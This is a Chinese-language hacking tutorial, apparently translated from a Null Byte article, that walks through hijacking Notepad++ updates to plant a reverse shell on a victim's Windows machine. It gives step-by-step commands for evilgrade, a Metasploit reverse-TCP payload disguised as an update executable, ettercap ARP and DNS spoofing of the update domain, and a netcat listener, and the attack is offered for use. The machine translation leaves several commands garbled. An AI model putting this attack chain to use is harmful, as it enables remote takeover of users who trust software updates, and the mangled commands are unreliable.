有無數種方法破解系統。如果我們想應用自己的系統,我們不應該忽視任何的可能性,我們需要搜索弱點保持警惕。在這次破解,我們將會看看濫用信任用戶對軟件更新,他們的系統上安裝監聽器/rootkit。
利用”值得信賴”的軟件更新
我們都看見這條消息 — —現在有可用的軟件更新!無一例外,我們相信此消息並下載的更新,大概是使我們更好地工作、 添加新功能,或使我們的系統更安全的系統。
如果,相反,當我們要提示下載更新,我們的系統會給出一個惡意的***控制安裝惡意軟件?這是我們要對我們的受害者在這裏做什麼 !
不同於其他******,這是一個獨立的,正是這樣的操作系統、 端口等。在這裏我們將濫用用戶信任,沒有一個操作系統或應用程序。
這將是我們爲 Null Byte, 做過的最複雜***之一,所以如果你是新來的***,你可能想回來後做點工作背景。這次破解也利用了我們做在早些時候教程使用中間人***,所以您可能想要先讀一下。
第 1 步: 安裝 NotePad + +
在這次破解,我們將使用Notepad + +作爲我們的示例軟件,我們將劫持其更新,所以您將需要將它安裝在一個系統上。在我的示例中,我下載了它到 Windows 7 的系統。
您可以下載最新版本的 Notepad + +.
第 2 步: 下載和安裝 EvilGrade
下一步,我們會安裝Infobytesec evilgrade,它被設計成一個模塊化的框架,使***者可以通過注射”evil”更新到不知道用戶的更新。我們可以下載從 GitHub evilgrade.
現在被稱爲evilgrade目錄。
mkdir -p /root/evilgrade
現在更改目錄。
cd /root/evilgrade
下一步我們解壓並安裝 evilgrade。
tar -xvf isr-evilgrade-2.0.0.tar.gz
第 3 步: 運行 Evilgrade
下一步我們需要運行 evilgrade。我們鍵入:
./ evilgrade
我們現在使用它從它自己的提示符運行於 evilgrade 交互式模式
evilgrade >
第 4 步: 列出模塊
現在,運行的 evilgrade,讓我們看看這些evilgrade 已建的模塊。在這裏,代表evilgrade模塊設計劫持其更新/升級過程的軟件。在這個技巧,當然,我們會劫持Notepad++升級。
正如你可以看到下面,evilgrade有許多其它的軟件模塊,但它遠覆蓋所有的軟件更新/升級。
show modules
關鍵是要找到受害者是使用什麼程序,也是evilgrade的模塊和目標應用程序列表。
第 5 步: 配置Notepad
接下來,我們需要告訴我們想要劫持其升級的過程是什麼的軟件的 evilgrade。讓我們告訴 evilgrade 我們想要劫持notepadplus.
evilgrade>configure notepadplus
第 6 步: 查看 Notepad + + 模塊需要什麼參數
我們的下一步就是看哪些參數是evilgrade notepadplus模塊需要的功能。我們用類似下面的命令檢查這個Metasploit鍵入:
show options
我們可以在上面的截圖中看到此模塊,需要我們到 Notepad + + 的軟件和更新,即 sourceforge.net 源點。此外,我們需要設置代理,將是我們想要在受害人在預期更新位置上安裝的惡意負載。
第 7 步: 生成一個Metsploit有效載荷
在,我們已經設置evilgrade了,我們需要開發一個惡意的有效載荷交付給升級軟件,而不是實際的升級。我們可以用Metasploit的做到這一點。
如果您按照我的Metasploit的其他教程,你知道,我們可以選擇一些不同的有效載荷使用Metasploit的(有效載荷是什麼,我們加載到受害系統給我們控制)。在這種情況下,我們將使用其中一個最基本的有效載荷,在reverse tcp shell.。
我們可以產生一個有效載荷而不使用以下命令打開Metasploit的。此命令需要從Metasploit的框架,並將其裝入一個利用一個叫做notepadplus_update.exe文件。
/pentest/exploits/framework/modules/payloads/windows
shell_reverse_tcp LHOST 192.168.1.104
> /root/evilgrade/notepadplus_update.exe
請注意,如果您使用的是不同版本的Backtrack或kali,這些有效載荷模塊在不同的目錄。
第8步:啓動Evilgrade
接下來,我們必須啓動evilgrade 服務器。這是以一個簡單的初始命令。
evilgrade>start
第 9 步:添加Notepad++更新服務器作爲域
我們的下一步是添加Notepad++我們要劫持域名。我們可以通過添加一個進入ettercap的etter.dns欺騙模塊。這使我們能夠欺騙受害者的軟件更新源域名。
由於Notepad++是由SourceForge,我們添加下面一行的etter.dns文件結束。
notepad-plus.sourceforge.net A 192.168.1.104
當然,你使用的IP地址應該是你想要更新過程來尋找你的邪惡更新IP地址。
第 10 步:配置iptables
iptables是Linux或UNIX內置防火牆/路由器。我們可以使用這個功能,路由的流量通過我們的系統在一箇中間人***。讓我們在您最喜愛的文本編輯器中打開etter.conf文件。
kwrite /etc/etter.conf
如圖所見,通過文件當你滾動約三分之二,有一個條目,我已在 iptables 上突出顯示。簡單地取消註釋 (刪除 #) 到第二個和第三行,以便使用 iptables。
第 11 步: 開始 Ettercap
我們現在可以用下面的命令啓動 ettercap。
ettercap-Tqi eth0-P dns_spoof-M arp 192.168.1.114 192.168.1.104
條件:
-T 指定終端接口
-q 使用安靜模式
-i eth0說,我們想要使用eth0作爲我們的接口
-P dns_spoof選定,我們想要使用 dns欺騙 plug in_
-M arp說,我們想要使用 arp 中間人***上之間兩個 IP addresses_
第 12 步: 開啓 Netcat 監聽器
現在我們需要從我們的***機器啓動netcat 偵聽器。我們需要監聽的evilgrade應用程序定義的端口,在這種情況下,Notepad + + 的端口爲1234。
nc-l-p 1234
第 13 步: 打開 Notepad + +
現在,讓我們在受害者計算機打開 Notepad + + 。